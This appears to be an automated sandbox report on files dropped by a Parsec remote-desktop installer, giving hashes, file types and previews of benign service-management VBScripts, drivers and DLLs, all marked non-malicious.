                              SSDEEP:3:jeYcRm81GX7Z9HCCoOWuu5G3RKLfObvn:jeUi+4uu5GcyLn
                              MD5:C78520C3162C1962F3164714B37EB4D0
                              SHA1:67C19B8AEA7AD99465976DBCD3EFCFDD7D62E3FE
                              SHA-256:DEA38BD553ABE93C689DE42D0220ADD18F9BE3E3D2FA53F97EB8649F586DF4F3
                              SHA-512:CFBFC2C7DD8019F98B77E8881680EF9D0135A210FB9B0136A4992C236D971E247AA1641CD2EAFDC5F6F5BB61002B30EA14B226127C4CEF04F3B3D6BE3A941FCC
                              Malicious:false
                              Preview:Set sh = CreateObject("Wscript.Shell").Dim args..args = "schtasks /delete /tn ParsecTeams /f".sh.Run args, 0, true.
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):412
                              Entropy (8bit):4.864624018635759
                              Encrypted:false
                              SSDEEP:12:ixc3AAl7J2WjifH0//37ClesqAIN58CzA7n:iOAs7T//7D7AjG+n
                              MD5:971E2A344A6E17347A81EEB21ADA7BA7
                              SHA1:37E034C29ADDA9B118B75BFDC7C6F41AAC71E257
                              SHA-256:01F62A12DE3307B375DFF3EBCD6961D76FFCBC24F70682C7875655A811CE76A1
                              SHA-512:5EA0750DC07FF1A0EB1807043B48FB9ED54F6DCB96CE03CB543B0EA36D326779814B6CB87091373574911662A35D75B576E35C5B8D781DB36FE1503F8287C65D
                              Malicious:false
                              Preview:Set sh = CreateObject("Wscript.Shell").Set fs = CreateObject("Scripting.FileSystemObject").Dim args.Dim path..If Wscript.Arguments.Count = 0 Then..path = fs.GetAbsolutePathName("") & "\pservice.exe".Else..path = Wscript.Arguments(0).End If..args = "sc.exe create Parsec binPath= ""\""" & path & "\"""" start= auto type= interact type= own".sh.Run args, 0, true..args = "sc.exe start Parsec".sh.Run args, 0, true.
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):164
                              Entropy (8bit):4.745893446511344
                              Encrypted:false
                              SSDEEP:3:jeYcRm81GX7Z9HCCodNFfXSDoqObvv8oFKsocGAM4JqObvn:jeUi+C/SD+Lv81cXMq7Ln
                              MD5:F7B0C63E7AEA5CBD96F7BF1021B28B73
                              SHA1:FC5B11A6BF022740DE3BA15455B06AD3F061366B
                              SHA-256:71F9CC28497B959377439F6611615EF582745DD5B9CCA02B5C4B24BB1FC3DFB8
                              SHA-512:C957B7B45B188AF0B6E6698507E94564E8E5CCC8DBF5F0237827DF373878291095887422584F7F3B7833CBCDD682531FA75C974BA1137031B32BF2FFBA268191
                              Malicious:false
                              Preview:Set sh = CreateObject("Wscript.Shell").Dim args..args = "sc.exe control Parsec 200".sh.Run args, 0, true..args = "taskkill /F /IM parsecd.exe".sh.Run args, 0, true.
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):150
                              Entropy (8bit):4.521058872484995
                              Encrypted:false
                              SSDEEP:3:jeYcRm81GX7Z9HCCodNFNv1p+aObvv8odNFPmYaObvn:jeUi+CNj+LLv8CuYLLn
                              MD5:B90E75DD7903CB2D6328BB3714865C7A
                              SHA1:2D32868DEB198726ED5FEB80B66542BAD7FBACEE
                              SHA-256:970B3C2A9EA1906A177810990478932E3517F47ABA267CF2AB9E4BA65E7B475F
                              SHA-512:3D4BFB86EC98FD85843AE5B63DCF5F475C6500380F02BB4D0DEE15A5F7E2334ABDBBCD9420B8AC05B5BEB8A63B9EA16ABCD70AE01C04B87A423FC288FF4DCA0A
                              Malicious:false
                              Preview:Set sh = CreateObject("Wscript.Shell").Dim args..args = "sc.exe stop Parsec".sh.Run args, 0, true..args = "sc.exe delete Parsec".sh.Run args, 0, true.
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Mar 28 13:46:56 2024, mtime=Thu Nov 14 01:12:05 2024, atime=Thu Mar 28 13:46:56 2024, length=465792, window=hide
                              Category:dropped
                              Size (bytes):800
                              Entropy (8bit):4.581172484434597
                              Encrypted:false
                              SSDEEP:12:8XnXk1c0YXCh9WVdpF4412BEzYt0aYA+jAfcbdpW31l7LPBmV:8X0K7dAmYq5AfodIFJPBm
                              MD5:A0AC374B7DF1C8327EFE0FC2ACDA5A5A
                              SHA1:851B8C41EFBEBB8D8A292B44D5C9B9F8E8D9CEEC
                              SHA-256:C11B39EDDA121018EB9B13F5DE48C207F68307377934052FBD080EED792DAB98
                              SHA-512:7095ECE76FD687571E383C5EBFBF8894810067DB0164484C7F1134DFE9F98D99998804ED73A6F17577C9116D9C94DEAA0436AACEDC462BEDC8435232974E6FA1
                              Malicious:false
                              Process:C:\Windows\System32\runonce.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):24576
                              Entropy (8bit):2.0857798938129686
                              Encrypted:false
                              SSDEEP:384:jw82APUHhWDORJ9lhvIf5cVamJ6vX7bQVDKYJxK5vXL9lnI8r1O2ArLoKYcUCzr9:jW
                              MD5:4BACF4A9E591C0B98AD556E8BF432977
                              SHA1:921525E23C3D7496E4D21B8490AC8A9DA2DAF5F0
                              SHA-256:94570FD3C177B0AE607FF6BAD1B36224C79390C481E46CEFEB07F783E0AB2F96
                              SHA-512:7C0C7D1954137F46B35114BABC420EFA0C0E7BCA2FAB9DF50ADF7825A71E7F6E94253B13485927A8BA65035806041249CD380CBF1A5CDCEA3313195AAE93B214
                              Malicious:false
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):6144
                              Entropy (8bit):4.720366600008286
                              Encrypted:false
                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\Desktop\uu8v4UUzTU.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3220480
                              Entropy (8bit):6.3129799359419705
                              Encrypted:false
                              SSDEEP:49152:Odx4HDQNJL0VR6SgMt+k4RiP+RmXMjiINiMq95FoHVHNTQTEjy333zmgS:vHDYsqiPRhINnq95FoHVBy333CB
                              MD5:828B7D7624C14BE1F3D8122F6E2FAC53
                              SHA1:1E51B52B0E6AA39BB4C465767E5131B99E39CAB2
                              SHA-256:6F28DFB808D325740AE9189598AD4AB2D7E2B77293DCFBB7A6B00AC852B719DF
                              SHA-512:E83136F55417D0AD0748A78FAA7E9C88885520B4B596ACA51B70F3816D21FD71112A0BD1E6968FB8CB22E5C3956B3BA0A5D20DACFC54F1EEF3EAB5FC7661DDCB
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):5.814115788739565
                              Encrypted:false
                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                              MD5:CFF85C549D536F651D4FB8387F1976F2
                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7168
                              Entropy (8bit):5.298362543684714
                              Encrypted:false
                              SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                              MD5:675C4948E1EFC929EDCABFE67148EDDD
                              SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                              SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                              SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):5.814115788739565
                              Encrypted:false
                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                              MD5:CFF85C549D536F651D4FB8387F1976F2
                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):4096
                              Entropy (8bit):3.3422620069068625
                              Encrypted:false
                              SSDEEP:48:qKDBQE7F4aBr1wH8l9QIXTZShMmj3jkCTbGr7X:5WkFZruHSXTH6jkCnGr7X
                              MD5:2F69AFA9D17A5245EC9B5BB03D56F63C
                              SHA1:E0A133222136B3D4783E965513A690C23826AEC9
                              SHA-256:E54989D2B83E7282D0BEC56B098635146AAB5D5A283F1F89486816851EF885A0
                              SHA-512:BFD4AF50E41EBC56E30355C722C2A55540A5BBDDB68F1522EF7AABFE4F5F2A20E87FA9677EE3CDB3C0BF5BD3988B89D1224D32C9F23342A16E46C542D8DC0926
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7168
                              Entropy (8bit):5.298362543684714
                              Encrypted:false
                              SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                              MD5:675C4948E1EFC929EDCABFE67148EDDD
                              SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                              SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                              SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):200704
                              Entropy (8bit):6.552977186185562
                              Encrypted:false
                              SSDEEP:3072:2pBNN6AmU9cDlKd3P6V9nSm49WTgKg4Fa1V3FuXRAuAg0FubA9cVsL+73:2pzxmQ3yL+9MgKbxAOEXY
                              MD5:A858C1A57E32485505B1977CF0A125BE
                              SHA1:25D86C4B51F7CC10FC70E3A0493A39C4460CC350
                              SHA-256:1462A072345E86318B981089B08B613A34027DDF527BFB66606C683F218FC3B4
                              SHA-512:32B597FC2412A9407FD12AC77C556FF9740F1DD0D2055426D11A7BAF21B09C536A84CFB97865B4E94168656514E7CE71EB2BC4122AA340100F4CE483BAD1722D
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......;.....Q..Q..Q.@SQs.Q.@QQ..Q.@PQb.QD..Pj.QD..PN.QD..P_.Q.#lQ~.Q.#iQv.Q..Q..Q.P~.Q.P~.Q.]Q~.Q..5Q~.Q.P~.QRich..Q........................PE..L.....sX...........!.........2...............................................p............@.................................d...d....0..P....................@..| ......p...........................`...@...............X............................text...c........................... ..`.rdata..<...........................@..@.data...(...........................@....gfids..............................@..@.tls......... ......................@....rsrc...P....0......................@..@.reloc..| ...@..."..................@..B........................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):5.814115788739565
                              Encrypted:false
                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                              MD5:CFF85C549D536F651D4FB8387F1976F2
                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):9728
                              Entropy (8bit):5.158136237602734
                              Encrypted:false
                              SSDEEP:96:o0svUu3Uy+sytcS8176b+XR8pCHFcMcxSgB5PKtAtgt+Nt+rnt3DVEB3YcNqkzfS:o0svWyNO81b8pCHFcM0PuAgkOyuIFc
                              MD5:6C3F8C94D0727894D706940A8A980543
                              SHA1:0D1BCAD901BE377F38D579AAFC0C41C0EF8DCEFD
                              SHA-256:56B96ADD1978B1ABBA286F7F8982B0EFBE007D4A48B3DED6A4D408E01D753FE2
                              SHA-512:2094F0E4BB7C806A5FF27F83A1D572A5512D979EEFDA3345BAFF27D2C89E828F68466D08C3CA250DA11B01FC0407A21743037C25E94FBE688566DD7DEAEBD355
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L.....Oa...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7168
                              Entropy (8bit):5.298362543684714
                              Encrypted:false
                              SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                              MD5:675C4948E1EFC929EDCABFE67148EDDD
                              SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                              SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                              SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12001
                              Entropy (8bit):7.346082125667387
                              Encrypted:false
                              SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                              MD5:CFE9C8FD6FAF915A653D39895D3D0862
                              SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                              SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                              SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                              Malicious:false
                              Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):3005
                              Entropy (8bit):5.435819624452916
                              Encrypted:false
                              SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                              MD5:04F8C6A4C9D90818704596FFF273AD0E
                              SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                              SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                              SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                              Malicious:false
                              Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):263336
                              Entropy (8bit):6.416646624342821
                              Encrypted:false
                              SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                              MD5:591AB089C7184E33D0F4DB12B4CA5498
                              SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                              SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                              SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12001
                              Entropy (8bit):7.346082125667387
                              Encrypted:false
                              SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                              MD5:CFE9C8FD6FAF915A653D39895D3D0862
                              SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                              SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                              SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                              Malicious:false
                              Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):3005
                              Entropy (8bit):5.435819624452916
                              Encrypted:false
                              SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                              MD5:04F8C6A4C9D90818704596FFF273AD0E
                              SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                              SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                              SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                              Malicious:false
                              Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):263336
                              Entropy (8bit):6.416646624342821
                              Encrypted:false
                              SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                              MD5:591AB089C7184E33D0F4DB12B4CA5498
                              SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                              SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                              SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11858
                              Entropy (8bit):7.334407083811773
                              Encrypted:false
                              SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                              MD5:560EFA3FA6E5AB486D958B12207AC6ED
                              SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                              SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                              SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                              Malicious:false
